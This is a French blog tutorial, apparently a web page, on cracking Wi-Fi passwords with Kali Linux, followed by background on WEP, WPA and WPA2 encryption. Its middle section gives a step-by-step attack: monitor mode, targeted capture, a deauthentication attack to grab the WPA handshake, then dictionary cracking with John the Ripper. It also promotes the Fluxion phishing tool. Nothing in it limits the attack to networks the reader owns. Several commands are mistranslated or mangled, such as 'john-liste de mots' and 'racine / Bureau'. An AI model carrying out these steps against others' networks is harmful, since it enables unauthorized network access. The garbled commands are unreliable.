La Question La Plus Posée Sur Google Est De Savoir Comment Pirater Le Wifi En Utilisant Kali Linux, Pirater le wifi, Comment Pirater Le Wifi En Utilisant Kali Linux, etc. Mais D’abord Comprendre Ce Qu’est le Wifi & son cryptage.
Contenu de la Publication
- Qu’est-Ce que le Wi-Fi et Est-Il Possible De Le Pirater?
- Outils Utilisés Pour Pirater le Mot de Passe WiFi Dans Kali-Linux
- Airmon-ng
- Aireplay-ng
- Airodump-ng
- Hccap
- John l’Éventreur
- Aircrack-ng
- Étapes Pour Pirater le WiFi En Utilisant Kali-Linux ou Avec Tout Autre SYSTÈME D’Exploitation Linux Debian.
- Étape 1 :
- Étape 2:
- Étape 3:
- Étape 4:
- Étape 5:
- Étape 6:
- Outil de piratage Wifi :- Fluxion
- Cryptage sans fil
- Cryptage WEP
- Comment fonctionne le WEP
- Cryptage WPA
- Fonctionnement du WPA
- Cryptage WPA 2
- WPA2 -Personal
- WPA2-Enterprise
- Fonctionnement de WPA2
Qu’est-Ce que le Wi-Fi et Est-Il Possible De Le Pirater?
Le Wi-Fi est le nom d’une technologie de réseau sans fil populaire qui utilise les ondes radio pour fournir des connexions Internet et Réseau haut débit sans fil. Une idée fausse commune est que le terme Wi-Fi est l’abréviation de « fidélité sans fil », mais ce n’est pas le cas. Wi-Fi est simplement une expression déposée qui signifie IEEE 802.11x.
Quand on parle de piratage wifi depuis n’importe quel appareil, la sécurité de ce wifi est la plus importante. Ainsi, lorsque nous essayons de pirater le wifi, il est très facile de déchiffrer ou de pirater le mot de passe du système disponible WPS. WPS est l’un des types de cryptage, qui est utilisé pour sécuriser le réseau wifi, alors commençons par un tutoriel rapide.
Outils Utilisés Pour Pirater le Mot de Passe WiFi Dans Kali-Linux
Nous utilisons principalement le jeu d’outils intégré à kali Linux pour pirater le mot de passe wifi, ce qui suit:
- airmon-ng
- aireplay-ng
- airodump-ng
- hccap
- john l’éventreur
- aircrack-ng
Airmon-ng
Ce script peut être utilisé pour activer le mode moniteur sur les interfaces sans fil. Il peut également être utilisé pour revenir du mode moniteur au mode géré. La saisie de la commande airmon-ng sans paramètres affichera l’état des interfaces.
utilisation: airmon-ng < start|stop > < interface > ou airmon-ng < check|check kill >
Aireplay-ng
Aireplay-ng est utilisé pour injecter des trames.
La fonction principale est de générer du trafic pour une utilisation ultérieure dans aircrack-ng pour le craquage des clés WEP et WPA-PSK. Il existe différentes attaques qui peuvent provoquer des désauthentifications dans le but de capturer des données de prise de contact WPA, de fausses authentifications, de relecture de paquets interactive, d’injection de demande ARP artisanale et de réinjection de demande ARP. Avec l’outil packetforge-ng, il est possible de créer des cadres arbitraires.
La plupart des pilotes doivent être corrigés pour pouvoir injecter.
Airodump-ng
Airodump-ng est utilisé pour la capture de paquets de trames brutes 802.11 et est particulièrement adapté à la collecte de WEP IV (Vecteur d’initialisation) dans le but de les utiliser avec aircrack-ng. Si vous avez un récepteur GPS connecté à l’ordinateur, airodump-ng est capable de consigner les coordonnées des points d’accès trouvés.
De plus, airodump-ng écrit plusieurs fichiers contenant les détails de tous les points d’accès et clients vus.
Hccap
Pour convertir les hachages de capture aircrack-ng en .hccapx nous utilisons cette commande.
John l’Éventreur
Pour déchiffrer le mot de passe, nous utilisons john l’éventreur dans la dernière étape. nous utilisons cet outil pour comparer les hachages avec le dictionnaire de mots de passe. Il existe de nombreuses autres façons, mais nous allons en essayer une.
Aircrack-ng
Aircrack-ng est une suite complète d’outils pour évaluer la sécurité du réseau WiFi.
Il se concentre sur différents domaines de la sécurité WiFi:
- Surveillance: Capture de paquets et exportation de données vers des fichiers texte pour un traitement ultérieur par des outils tiers
- Attaque: Attaques de relecture, désauthentification, faux points d’accès et autres via injection de paquets
- Test: Vérification des cartes WiFi et des capacités du pilote (capture et injection)
- Craquage: WEP et WPA PSK (WPA 1 et 2)
Étapes Pour Pirater le WiFi En Utilisant Kali-Linux ou Avec Tout Autre SYSTÈME D’Exploitation Linux Debian.
Toutes les commandes avec description sont données ci-dessus, vérifiez que si vous avez un problème.
Étape 1 :
Tout d’abord, mettez votre carte réseau en mode moniteur pour surveiller les réseaux environnants.
#airmon-ng start wlan1
# airodump – ng wlan1mon
Étape 2:
#airodump-ng–bssid 2C:55:D3:B1:35:0C-c 1-w kalip300 wlan1mon
Étape 3:
#aireplay-ng-0 0-a 2C:55:D3:B1:35:0C wlan1mon
Après avoir capturé le fichier handshak avec succès, nous voyons quelque chose comme ça.
Étape 4:
#aircrack-ng kalip300-01.cap-j jean
Étape 5:
#hccap2john john.hccap > wpa
Étape 6:
# john-liste de mots */root/Desktop/rockyou.txt / racine / Bureau / wpa
Et nous piratons avec succès le mot de passe wifi par kali linux
Outil de piratage Wifi :- Fluxion
Fluxion est un outil d’audit de sécurité et de recherche en ingénierie sociale. C’est un remake de linset par vk496 avec (espérons-le) moins de bugs et plus de fonctionnalités. Le script tente de récupérer la clé WPA/WPA2 à partir d’un point d’accès cible au moyen d’une attaque d’ingénierie sociale (phishing). Il est compatible avec la dernière version de Kali (rolling). La configuration des attaques de Fluxion est principalement manuelle, mais le mode automatique expérimental gère certains paramètres de configuration des attaques. Lisez la FAQ avant de demander des problèmes.
Cryptage sans fil
Cryptage WEP
Wired Equivalent Privacy (WEP) est un protocole sans fil IEEE 802.11 qui fournit des algorithmes de sécurité pour la confidentialité des données pendant les transmissions sans fil.
WEP utilise un vecteur d’initialisation de 24 bits (IV) pour former le chiffrement de flux RC4 Pour la confidentialité, et la somme de contrôle CRC-32 pour l’intégrité de la transmission sans fil.
Comment fonctionne le WEP
- La somme de contrôle CRC-32 est utilisée pour calculer une valeur de contrôle d’intégrité de 32 bits (ICV) pour les données, qui, à leur tour, sont ajoutées à la trame de données.
2. Un nombre arbitraire de 24 bits connu sous le nom de Vecteur d’initialisation (IV) est ajouté à la clé WEP; La clé WEP et IV sont appelées ensemble comme graine WEP.
3. La graine WEP est utilisée comme entrée de l’algorithme RC4 pour générer un flux de clés (le flux de clés est analysé en bits avec la combinaison de données et d’ICV pour produire les données chiffrées).
4. Le champ IV (IV + PAD + KID) est ajouté au texte chiffré pour générer une trame MAC
Cryptage WPA
L’accès protégé par Wi-Fi (WPA) est une méthode de cryptage des données pour les WLAN basée sur 802.11 normes.
Il s’agit d’un instantané de 802.11i (en cours de développement) fournissant un cryptage plus fort et permettant une authentification PSK pour l’authentification EAP.
Fonctionnement du WPA
La clé de chiffrement temporel, l’adresse de transmission et le compteur de séquences TKIP (TSC) sont utilisés comme entrée de l’algorithme RC4 pour générer la keystram.
L’unité de données de service MAC (MSDU) et le contrôle d’intégrité des messages (MIC) sont combinés à l’aide de l’algorithme de Michael.
La combinaison de MSDU et MIC est fragmentée pour générer une unité de données de protocole MAC (MPDU).
Une valeur de contrôle d’intégrité de 32 bits (ICV) est calculée pour la MPDU
La combinaison de MPDU et d’ICV est XORée au niveau du bit avec Keysteam Pour Produire les données chiffrées
L’IV est ajouté aux données chiffrées pour générer une trame MAC.
Cryptage WPA 2
WPA 2 fournit aux utilisateurs d’entreprise et WI-FI une protection des données et un contrôle d’accès au réseau renforcés
Fournit une sécurité de niveau gouvernemental en mettant en œuvre l’algorithme de cryptage AES conforme à la norme FIPS 140-2 du National Institute of Standards and Technology (NIST).
WPA2 -Personal
WPA2-Personal utilise un mot de passe de configuration (clé pré-partagée) pour protéger l’accès réseau non autorisé.
En mode PSK, chaque dispositif de réseau sans fil chiffre le trafic réseau à l’aide d’une clé de 128 bits dérivée d’une phrase secrète de 8 à 63 caractères ASCII.
WPA2-Enterprise
Il inclut EAP ou RADIUS pour l’authentification centralisée des clients à l’aide de plusieurs méthodes d’authentification, telles que les cartes à jetons, les Kerberos, les certificats, etc.
Les utilisateurs se voient attribuer des identifiants de connexion par un serveur centralisé qu’ils doivent présenter lors de la connexion au réseau.
Fonctionnement de WPA2
Dans l’implémentation CCMP de WPA2, les données d’en-tête Mac sont utilisées pour créer des données d’authentification supplémentaires (AAD).
Un numéro de paquet séquencé (PN) est utilisé pour construire nonce.
AAD, clé temporelle et nonce ainsi que CCMP sont utilisés pour le cryptage des données.
Une trame MAC WPA2 est construite à l’aide de l’en-tête MAC, de l’en-tête CCMP, des données cryptées et du MICRO crypté
Vous avez peut-être manqué Comment pirater un téléphone